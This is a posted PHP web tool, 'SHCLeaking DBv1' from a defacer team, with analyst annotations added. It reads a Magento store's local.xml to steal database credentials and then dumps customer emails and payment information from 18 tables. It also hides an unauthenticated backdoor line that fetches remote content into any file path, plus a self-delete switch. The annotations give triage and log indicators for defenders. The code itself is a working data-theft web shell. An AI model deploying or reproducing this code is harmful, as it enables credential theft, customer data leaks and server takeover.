bug7sec

SHCLeaking DBv1

Apr 16th, 2016
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>SHCLeaking DBv1 | Bug7sec Team</title>
  5. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
  6. <style type="text/css">
  7.     body{
  8.                 color: #3EF403;
  9.                 background-color: black;
  10.         }
  11.     input {
  12.     border: dashed 1px;
  13.     border-color: #333;
  14.     BACKGROUND-COLOR: Black;
  15.     font: 8pt Verdana;
  16.     color: #0CFF37;
  17.         }
  18.  
  19.     select {
  20.     border: dashed 1px;
  21.     border-color: #333;
  22.     BACKGROUND-COLOR: Black;
  23.     font: 8pt Verdana;
  24.     color: #0CFF37;
  25. }
  26.     textarea {
  27.     margin: 0;
  28.     color: #fff;
  29.     background-color: #555;
  30.     border: 1px solid #df5;
  31.     font: 9pt Monospace,'Courier New'; }
  32.         </style>
  33.    
  34. </head>
  35. <body>
  36. <pre style="text-align: center">
  37. -[ SHCLeaking DBv1 |  Bug7sec Team ]-
  38. </pre>
  39. <Center>
  40. <form action="" method="post">
  41. <input type="text" value="<?= getcwd();?>/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/">
  42. <select name="cms">
  43.         <option>Magento</option>
  44. </select>
  45. <input type="submit" name="submit" value="Scan Now!"/>
  46. </form>
  47. </Center>
  48. <?php
      // error_reporting(0) sets the reporting level to none, so PHP warnings and notices
      // raised by the file and database calls below are not reported for this request.
  49. error_reporting(0);
  50. /**
  51. * Name      : SHCLeaking DBv1
  52. * Author    : Shor7cut
  53. * Team      : Bug7sec Team | http://facebook.com/bug7sec
  54. * Special   : Defacer Tersakiti Team , IndoXploit Team , Tuban Cyber Team , IDBTE4MNET
  55. *             and Balikita
  56. ------------------------------------------------------
  57. [Special Leaking]
  58. - Magento (add 15/04/2016)
  59. ======================================================
  60. - Merely editing the copyright is what lamers do; low skill.
  61. - Stay grateful, bro, without claiming someone else's code - Shor7cut
  62. */
  /**
   * Analyst summary of class shc (annotation only; code below is unchanged).
   *
   * The class reads a file, extracts the host/username/password/dbname elements from it,
   * connects to that MySQL database and collects one column from each of 18 tables into a
   * de-duplicated list that the page prints. The form on this page pre-fills the path with
   * the working directory plus /app/etc/local.xml and offers "Magento" as the only CMS.
   *
   * Defender relevance: if a copy of this file was reachable on a host, treat the database
   * credentials in that configuration file and the contents of the tables listed in
   * shc_dbg() as disclosed, and rotate the credentials. The title and banner string
   * "SHCLeaking DBv1 | Bug7sec Team" and the parameter names used by this page are usable
   * as search strings in file scans and web logs.
   *
   * Methods are declared as instance methods but are invoked statically (shc::get, shc::drop).
   */
  63. class shc
  64. {
          // Deletes the script itself: unlink() on the base name of the requested script,
          // resolved against the current working directory. The page calls this when the
          // query string carries x=d, so the file may no longer be on disk during triage;
          // web access logs are then the remaining evidence of its use.
  65.     public function drop(){
  66.         unlink(basename($_SERVER['PHP_SELF']));
  67.     }
          // Returns the contents of $location via file_get_contents(). The only caller on this
          // page passes the POSTed form field straight through, with no path restriction.
  68.     public function get($location){
  69.         $shc = file_get_contents($location);
  70.         return $shc;
  71.     }
          // Removes duplicate entries from the collected list (array_unique).
  72.     public function dpremove($data){
  73.         $shcUniX = array_unique($data);
  74.         return $shcUniX;
  75.     }
          // Builds the "Total Email" header line shown above the dumped values.
  76.     public function count($data){
  77.         return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
  78.     }
          // Extracts the CDATA-wrapped <host>, <username>, <password> and <dbname> values from
          // the supplied file text and returns them as JSON under the key 'shc_db'.
          // The match results are indexed without checking whether preg_match() found anything.
  79.     public function dbmagento($data){
  80.         $shc_regexhost       = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
  81.         $shc_regexusername   = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
  82.         $shc_regexpassword   = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
  83.         $shc_regexdatabase   = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
  84.         preg_match($shc_regexhost, $data, $shcleak_1);
  85.         preg_match($shc_regexusername, $data, $shcleak_2);
  86.         preg_match($shc_regexpassword, $data, $shcleak_3);
  87.         preg_match($shc_regexdatabase, $data, $shcleak_4);
  88.         $shc_host = $shcleak_1[1];
  89.         $shc_user = $shcleak_2[1];
  90.         $shc_pass = $shcleak_3[1];
  91.         $shc_db   = $shcleak_4[1];
  92.         $shc_json = array(
  93.             'host' => $shc_host,
  94.             'username' => $shc_user,
  95.             'password' => $shc_pass,
  96.             'database' => $shc_db,
  97.             );
  98.            return json_encode(array('shc_db' => $shc_json)
  99.         );
  100.     }
           // Uses the extracted credentials to connect to the database and harvest one column
           // per table. Returns the de-duplicated list of collected values.
           //
           // What a responder should take from this method:
           // - The database username and password are echoed into the HTML response without
           //   escaping, so they also appear in any captured response body.
           // - Both branches print the literal text "localhost"; only the font colour differs.
           // - It relies on the legacy mysql_* functions, which were removed in PHP 7.0, so the
           //   listing as posted depends on a PHP 5.x runtime.
           // - Each table is read with an unfiltered SELECT *; a burst of full-table reads over
           //   these 18 tables from the web application's database account is what database
           //   audit or slow-query logs would show.
           // - The output is labelled "Email", but the column map also pulls
           //   sales_flat_order_payment.additional_information and generic 'value' columns, so
           //   the disclosed data is not limited to e-mail addresses.
  101.     public function shc_dbg($data){
  102.         $jdata = json_decode(shc::dbmagento($data),true);
  103.         if($jdata['shc_db']['host']=="localhost"){
  104.             echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
  105.         }else{
  106.             echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
  107.         }
  108.         mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
  109.         mysql_select_db($jdata['shc_db']['database']);
               // Table name => query. Fixed strings only; nothing from the request reaches the SQL.
  110.         $query = array(
  111.             'admin_user'                        => 'SELECT * FROM admin_user' ,
  112.             'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
  113.             'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
  114.             'customer_entity'                   => 'SELECT * FROM customer_entity' ,
  115.             'newsletter_subscriber'             => 'SELECT * FROM newsletter_subscriber' ,
  116.             'newsletter_template'               => 'SELECT * FROM newsletter_template' ,
  117.             'sales_flat_order_address'          => 'SELECT * FROM sales_flat_order_address' ,
  118.             'sales_flat_order_payment'          => 'SELECT * FROM sales_flat_order_payment' ,
  119.             'sales_flat_quote'                  => 'SELECT * FROM sales_flat_quote' ,
  120.             'customer_entity_varchar'           => 'SELECT * FROM customer_entity_varchar' ,
  121.             'customer_address_entity_varchar'   => 'SELECT * FROM customer_address_entity_varchar' ,
  122.             'product_alert_stock'               => 'SELECT * FROM product_alert_stock' ,
  123.             'pws_productqa'                     => 'SELECT * FROM pws_productqa' ,
  124.             'sales_flat_order'                  => 'SELECT * FROM sales_flat_order' ,
  125.             'sales_flat_quote_address'          => 'SELECT * FROM sales_flat_quote_address' ,
  126.             'smtppro_email_log'                 => 'SELECT * FROM smtppro_email_log' ,
  127.             'webforms_results_values'           => 'SELECT * FROM webforms_results_values' ,
  128.             'sales_recurring_profile'           => 'SELECT * FROM sales_recurring_profile'
  129.         );
               // Table name => the single column kept from each fetched row.
  130.         $shcolom = array(
  131.             'admin_user'                        => 'email' ,
  132.             'sales_flat_order_payment'          => 'additional_information' ,
  133.             'sales_flat_quote_address'          => 'email' ,
  134.             'smtppro_email_log'                 => 'email_to' ,
  135.             'webforms_results_values'           => 'value' ,
  136.             'aw_blog_comment'                   => 'email' ,
  137.             'customer_entity_varchar'           => 'email' ,
  138.             'product_alert_stock'               => 'email' ,
  139.             'pws_productqa'                     => 'email' ,
  140.             'sales_flat_order_address'          => 'email' ,
  141.             'customer_entity'                   => 'email' ,
  142.             'sales_flat_order'                  => 'customer_email' ,
  143.             'customer_address_entity_varchar'   => 'value' ,
  144.             'core_email_queue_recipients'       => 'recipient_email' ,
  145.             'newsletter_subscriber'             => 'subscriber_email' ,
  146.             'newsletter_template'               => 'template_sender_email' ,
  147.             'sales_flat_quote'                  => 'customer_email' ,
  148.             'sales_recurring_profile'           => 'SELECT * FROM admin_user'
  149.         );
               // Run every query and append the mapped column of every row to $mail.
  150.         foreach ($query as $shc_key => $shc_query) {
  151.             $hasil = mysql_query($shc_query);
  152.                 while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
  153.                     $mail[] = $kolom_db[$shcolom[$shc_key]];
  154.                 }
  155.         }
  156.         return shc::dpremove($mail);
  157.     }
  158. }
       // Request handling for the page (annotation only; code below is unchanged).
       // Error reporting is switched off a second time before the request is processed.
  159. error_reporting(0);
       // NOTE(review): this statement is not part of the advertised "scan" feature. It runs on
       // every request, before the submit check and without any authentication, and writes
       // whatever file_get_contents() returns for the GET parameter shcpatchl to the path
       // named by the GET parameter shcpatch. Both values come from the query string, so the
       // page doubles as an unauthenticated file-write endpoint for anyone who can reach it.
       // For triage: search web access logs for query strings containing shcpatch= or
       // shcpatchl=, and review files created by the web server account around those requests.
  160. file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
       // Form handler: reads the file named in the POSTed shcpatch field, passes its text to
       // shc_dbg(), and prints the count line plus each collected value into a textarea.
       // The values are written into the page without HTML escaping.
  161. if($_POST['submit']){
  162. $data = shc::get($_POST['shcpatch']);
  163. $data = shc::shc_dbg($data);
  164. ?>
  165. <center><br><textarea style="margin: 0px; width: 527px; height: 172px;"><?= shc::count($data);?><?php foreach ($data as $value) {echo $value."\r\n";}?></textarea><br>
  166. </center>
  167. <?php
  168. }
       // Self-removal switch: a request with x=d in the query string deletes this script via
       // shc::drop(). That request is the last trace of the file in the access log.
  169. if($_GET['x']=="d"){
  170.     shc::drop();
  171. }
  172. ?>
  173.  
  174. </body>
  175. </html>